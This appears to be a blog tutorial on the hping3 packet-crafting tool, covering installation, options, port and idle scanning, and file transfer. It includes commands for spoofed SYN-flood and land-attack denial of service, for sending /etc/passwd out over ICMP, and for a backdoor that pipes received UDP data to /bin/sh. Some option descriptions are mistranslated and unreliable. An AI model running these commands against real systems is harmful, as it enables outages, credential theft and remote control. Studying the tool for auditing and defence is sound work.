Article directory
hping3
Test network and host security
Additional information
hping is an open source tool for generating and parsing TCPIP protocol packets. The creator is Salvatore Sanfilippo. The latest version is hping3, which supports using tcl scripts to automatically call its API. hping is a standard tool for security auditing, firewall testing and other tasks. The advantage of hping is that it can customize each part of the data packet, so users can flexibly detect the target machine in detail.
Install
yum install libpcap-devel tc-devel
ln -s /usr/include/pcap-bpf.h /usr/include/net/bpf.h
wget http://www.hping.org/hping3-20051105.tar.gz
tar zxvf hping3-20051105.tar.gz
cd hping3-20051105
./configure
make
make install
Options
-H, --help 显示帮助。
-v, -VERSION 版本信息。
-c, --count count 发送数据包的次数 关于countreached_timeout 可以在hping2.h里编辑。
-i, --interval 包发送间隔时间(单位是毫秒)缺省时间是1秒,此功能在增加传输率上很重要,在idle/spoofing扫描时此功能也会被用到,你可以参考hping-howto获得更多信息-fast 每秒发10个数据包。
-n, -nmeric 数字输出,象征性输出主机地址。
-q, -quiet 退出。
-I, --interface interface name 无非就是eth0之类的参数。
-v, --verbose 显示很多信息,TCP回应一般如:len=46 ip=192.168.1.1 flags=RADF seq=0 ttl=255 id=0 win=0 rtt=0.4ms tos=0 iplen=40 seq=0 ack=1380893504 sum=2010 urp=0
-D, --debug 进入debug模式当你遇到麻烦时,比如用HPING遇到一些不合你习惯的时候,你可以用此模式修改HPING,(INTERFACE DETECTION,DATA LINK LAYER ACCESS,INTERFACE SETTINGS,.......)
-z, --bind 快捷键的使用。
-Z, --unbind 消除快捷键。
-O, --rawip RAWIP模式,在此模式下HPING会发送带数据的IP头。
-1, --icmp ICMP模式,此模式下HPING会发送IGMP应答报,你可以用--ICMPTYPE --ICMPCODE选项发送其他类型/模式的ICMP报文。
-2, --udp UDP 模式,缺省下,HPING会发送UDP报文到主机的0端口,你可以用--baseport --destport --keep选项指定其模式。
-9, --listen signatuer hping的listen模式,用此模式,HPING会接收指定的数据。
-a, --spoof hostname 伪造IP攻击,防火墙就不会记录你的真实IP了,当然回应的包你也接收不到了。
-t, --ttl time to live 可以指定发出包的TTL值。
-H, --ipproto 在RAW IP模式里选择IP协议。
-w, --WINID UNIX ,WINDIWS的id回应不同的,这选项可以让你的ID回应和WINDOWS一样。
-r, --rel 更改ID的,可以让ID曾递减输出,详见HPING-HOWTO。
-F, --FRAG 更改包的FRAG,这可以测试对方对于包碎片的处理能力,缺省的“virtual mtu”是16字节。
-x, --morefrag 此功能可以发送碎片使主机忙于恢复碎片而造成主机的拒绝服务。
-y, -dontfrag 发送不可恢复的IP碎片,这可以让你了解更多的MTU PATH DISCOVERY。
-G, --fragoff fragment offset value set the fragment offset
-m, --mtu mtu value 用此项后ID数值变得很大,50000没指定此项时3000-20000左右。
-G, --rroute 记录路由,可以看到详悉的数据等等,最多可以经过9个路由,即使主机屏蔽了ICMP报文。
-C, --ICMPTYPE type 指定ICMP类型,缺省是ICMP echo REQUEST。
-K, --ICMPCODE CODE 指定ICMP代号,缺省0。
--icmp-ipver 把IP版本也插入IP头。
--icmp-iphlen 设置IP头的长度,缺省为5(32字节)。
--icmp-iplen 设置IP包长度。
--icmp-ipid 设置ICMP报文IP头的ID,缺省是RANDOM。
--icmp-ipproto 设置协议的,缺省是TCP。
--icmp-cksum 设置校验和。
--icmp-ts alias for --icmptype 13 (to send ICMP timestamp requests)
--icmp-addr Alias for --icmptype 17 (to send ICMP address mask requests)
-s, --baseport source port hping 用源端口猜测回应的包,它从一个基本端口计数,每收一个包,端口也加1,这规则你可以自己定义。
-p, --deskport [+][+]desk port 设置目标端口,缺省为0,一个加号设置为:每发送一个请求包到达后,端口加1,两个加号为:每发一个包,端口数加1。
--keep 上面说过了。
-w, --win 发的大小和windows一样大,64BYTE。
-O, --tcpoff Set fake tcp data offset. Normal data offset is tcphdrlen / 4.
-m, --tcpseq 设置TCP序列数。
-l, --tcpck 设置TCP ack。
-Q, --seqnum 搜集序列号的,这对于你分析TCP序列号有很大作用。
Hping3 function
Hping3 mainly has the following typical functional applications:
Firewall testing
Use Hping3 to specify various packet fields and conduct detailed tests on the firewall in turn. Please refer to: http://0daysecurity.com/articles/hping3_examples.html
Test the firewall's response to ICMP packets, whether it supports traceroute, whether to open a certain port, and conduct a denial of service attack (DoS attack) on the firewall. For example, test the target firewall in LandAttack mode (Land Attack sets the source address to be the same as the target address to induce the target machine to continuously establish connections with itself).
hping3 -S -c 1000000 -a 10.10.10.10 -p 21 10.10.10.10
port scan
Hping3 can also scan target ports. Hping3 supports specifying various TCP flag bits, length and other information. The following example can be used to detect whether port 80 of the target machine is open:
hping3 -I eth0 -S 192.168.10.1 -p 80
Among them, -I eth0 specifies the use of the eth0 port, -S specifies the flag bit SYN of the TCP packet, and -p 80 specifies the destination port of the probe.
hping3 supports a very rich set of port detection methods, and hping3 supports almost all of the scanning methods owned by nmap (except the connect method, because Hping3 only sends and receives packets and does not maintain connections, so it does not support connect mode detection). Moreover, Hping3 can provide more precise control over the probes sent, making it easier for users to fine-tune detection results. Of course, Hping3's port scanning performance and comprehensive processing capabilities cannot be compared with Nmap. It is generally used to scan only a small number of ports on a small number of hosts.
Idle scan
Idle scanning (Idle Scanning) is a method of anonymously scanning remote hosts. This method was also invented by Salvatore Sanfilippo, the author of Hping3. Currently, Idle scanning is also implemented in Nmap.
The scanning principle is: looking for an idle host (the host does not have any network traffic, and the IPID increases one by one). The attacking host first sends a detection packet to the idle host and obtains its IPID from the reply packet. Pretend to be the IP address of the idle host and send a SYN packet (assumed to be a SYN packet here) to the port of the remote host. If the destination port of the remote host is open, a SYN/ACK will be replied. At this time, after the idle host receives the SYN/ACK Reply to RST packet. Then the attacking host sends a detection packet to the idle host to obtain its IPID. Then by comparing the two IPID values, we can determine whether the remote host has replied to the data packet, and thus indirectly speculate on its port status.
denial of service attack
Using Hping3 can easily build a denial of service attack. For example, a large number of SYN connections are initiated to the target machine, the source address is forged to be 192.168.10.99, and each SYN packet is sent at an interval of 1000 microseconds.
hping3 -I eth0 -a192.168.10.99 -S 192.168.10.33 -p 80 -i u1000
Other attacks such as smurf, teardrop, land attack, etc. are also easy to construct.
file transfer
Hping3 supports file transfer through TCP/UDP/ICMP and other packages. It is equivalent to establishing secret tunnel communication with the help of TCP/UDP/ICMP packets. The implementation is to open the listening port and parse the content of the detected signature (the signature is a user-specified string) accordingly. Start the service on the receiving end:
hping3 192.168.1.159--listen signature --safe --icmp
Monitor the signature in the ICMP packet and parse the file content based on the signature.
Use signed ICMP packets to send files on the sending end:
hping3 192.168.1.108--icmp ?d 100 --sign signature --file /etc/passwd
Pass the /etc/passwd password file to the 192.168.10.44 host through ICMP packets. The sending packet size is 100 bytes (-d 100), and the sending signature is signature (-sign signature).
Trojan function
If Hping3 can be started on the remote host, it can start the listening port as a Trojan and open shell communication after the connection is established. Similar to netcat's backdoor function.
Example: Open UDP port No. 53 (DNS resolution service) locally to listen for data packets containing signatures from the 192.168.10.66 host, and call /bin/sh to execute the received data.
On the Trojan launcher:
hping3 192.168.10.66--listen signature --safe --udp -p 53 | /bin/sh
On the remote control:
echo ls >test.cmd
hping3 192.168.10.44 -p53 -d 100 --udp --sign siganature --file ./test.cmd
Send the file containing the ls command plus the signature to UDP port 53 of the 192.168.10.44 host. The packet data length is 100 bytes.
Of course, this is just a simple demonstration program. In real scenarios, the control end can use the shell to perform many advanced and complex operations.
Learn from scratchpython
[Learn python from scratch] 92. Use Python’s requests library to send HTTP requests and process responses
[Learn python from scratch] 91. Use decorators and dictionaries to manage request paths in a simple web application
[Learn python from scratch] 93. Use dictionary management Request path
[Learn python from scratch] 89. Use WSGI to build a simple and efficient Web server
[Learn python from scratch] 88. Detailed explanation of WSGI interface: realize simple and efficient web development
[Learn python from scratch] 87. Manually build an HTTP server in Python Implementation and multi-threaded concurrent processing
[Learn python from scratch] 86. In-depth understanding of the HTTP protocol and its role in browser and server communication
[Learn python from scratch] 85. Application of parallel computing technology in Python process pool
[Learn python from scratch] ] 84. In-depth understanding of threads and processes
[Learn python from scratch] 83. Python multi-process programming and the use of process pools
[Learn python from scratch] 82. Chat program implementation based on multi-threading
[Learn python from scratch] 81. Python more Application of thread communication and queue
[Learn python from scratch] 80. Thread access to global variables and thread safety issues
[Learn python from scratch] 79. Thread access to global variables and thread safety issues
[Learn python from scratch] 78. File download case
[ Learn python from scratch] 77. TCP server programming and precautions
[learn python from scratch] 76. Server and client: key components of network communication
[learn python from scratch] 75. TCP protocol: reliable connection-oriented transmission layer communication protocol
[Learn python from scratch] 74. UDP network program: Detailed explanation of port issues and binding information
[Learn python from scratch] 73. UDP network program - sending data
[Learn python from scratch] 72. In-depth understanding of Socket communication and creation of sockets Method
[Learn python from scratch] 71. Network ports and their functions
[Learn python from scratch] 70. Network communication methods and their applications: from direct communication to routers to connect multiple networks
[Learn python from scratch] 69. Network communication and IP address classification analysis
[Learn python from scratch] 68. Greedy and non-greedy modes in Python regular expressions
[Learn python from scratch] 67. The re module in Python: regular replacement and advanced matching technology
[Learn python from scratch] 66 .In-depth understanding of regular expressions: a powerful tool for pattern matching and text processing
[Learn python from scratch] 65. Detailed explanation of Python regular expression modifiers and their applications
[Learn python from scratch] 64. The re.compile method in Python regular expressions Detailed explanation of usage
[Learn python from scratch] 63. Introduction to the re.Match class and its attributes and methods in regular expressions
[Learn python from scratch] 62. Python regular expressions: a powerful string matching tool
[Learn python from scratch] 61. Detailed explanation and application examples of property attributes in Python
[Learn python from scratch] 60. Exploration generator: a flexible tool for iteration
[Learn python from scratch] 59. Iterator: An efficient tool for optimizing data traversal
[Learn python from scratch] 58. Custom exceptions in Python and methods of raising exceptions
[Learn python from scratch] 57. Use the with keyword in Python to correctly close resources
[Learn python from scratch] 56. The importance and application of exception handling in programming
[Learn python from scratch] 55. Serialization and sum in Python Deserialization, application of JSON and pickle modules
[Learn python from scratch] 54. Writing data in memory
[Learn python from scratch] 53. CSV files and Python’s CSV module
[Learn python from scratch] 52. Reading and writing files - Python file operation guide
[Learn python from scratch] 51. Opening and closing files and their applications in Python
[Learn python from scratch] 49. Object-related built-in functions in Python and their usage
[Learn python from scratch] 48 .Detailed explanation of inheritance and multiple inheritance in Python
[Learn python from scratch] 47. The concept and basic use of inheritance in object-oriented programming
[Learn python from scratch] 46. Analysis of __new__ and __init__ methods and singletons in Python Design Patterns
[Learn python from scratch] 45. Class methods and static methods in Python
[Learn python from scratch] 44. Private properties and methods in object-oriented programming
[Learn python from scratch] 43. Examples in Python object-oriented programming Properties and class attributes
[Learn python from scratch] 42. Built-in properties and methods in Python
[Learn python from scratch] 41. python magic method (2)
[Learn python from scratch] 40. python magic method (1)
[Learn python from scratch] 39. Basic object-oriented syntax and application examples
[Learn python from scratch] 38. How to use and import Python packages
[Learn python from scratch] 37. The use and precautions of Python custom modules
[Learn python from scratch] Learn python] 36. Methods and techniques of using pip for third-party package management in Python
[Learn python from scratch] 35. Python common system modules and their usage
[Learn python from scratch] 34. Detailed explanation of the import and use of Python modules
[ Learn python from scratch] 33. The role of decorators (2)
[Learn python from scratch] 32. The role of decorators (1)
[Learn python from scratch] 31. In-depth understanding of higher-order functions and closures in Python
[From Learn python from scratch】30. In-depth understanding of recursive functions and anonymous functions
【learn python from scratch】29. "Detailed explanation of function parameters" - understand the different uses of Python function parameters
【learn python from scratch】28. Local variables and global variables in Python Variables
[Learn python from scratch] 27. The use of Python functions and nested calls
[Learn python from scratch] 25. Functions: a tool to improve the efficiency of code writing
[Learn python from scratch] 24. String operations and traversal methods in Python
[Learn python from scratch] 23. How to use sets (set) and common operations in Python
[Learn python from scratch] 22. Add, delete, modify, and query dictionary variables in Python
[Learn python from scratch] 21. Python tuples and dictionaries
[Learn python from scratch] 20. Python list operation skills and examples
[Learn python from scratch] 19. Applications of looping through lists and list nesting
[Learn python from scratch] 18. Detailed explanation of the basic operations of Python lists (1)
[From Learning python from scratch】 17. The format method of Python strings (2)
【Learning python from scratch】 16. The format method of Python strings (1)
【Learning python from scratch】 15. In-depth understanding of strings and character set encoding
【From Learning python from scratch】14. Common operations on Python strings (2)
【Learning python from scratch】13. Common operations on Python strings (1)
【Learning python from scratch】12. Python string operations and applications
【Learning python from scratch】 11. Python loop statements and control flow
[Learn python from scratch] 10. Detailed explanation of Python conditional statements and if nesting
[Learn python from scratch] 09. Conditional judgment statements in Python
[Learn python from scratch] 08. Python understands bit operations operator, operator priority
[Learn python from scratch] 07. Detailed explanation of Python operators: assignment, comparison and logical operators
[Learn python from scratch] 06. Use arithmetic operators in Python for calculations and string concatenation
[Learn from scratch] python ] 05. Output and input in Python
[Learn python from scratch] 04. Basics of Python programming: variables, data types and identifiers
[Learn python from scratch] 03. Python interactive programming and detailed explanation of comments
[Learn python from scratch] 02. Introduction to development tools
[Learn python from scratch] 01. Install and configure python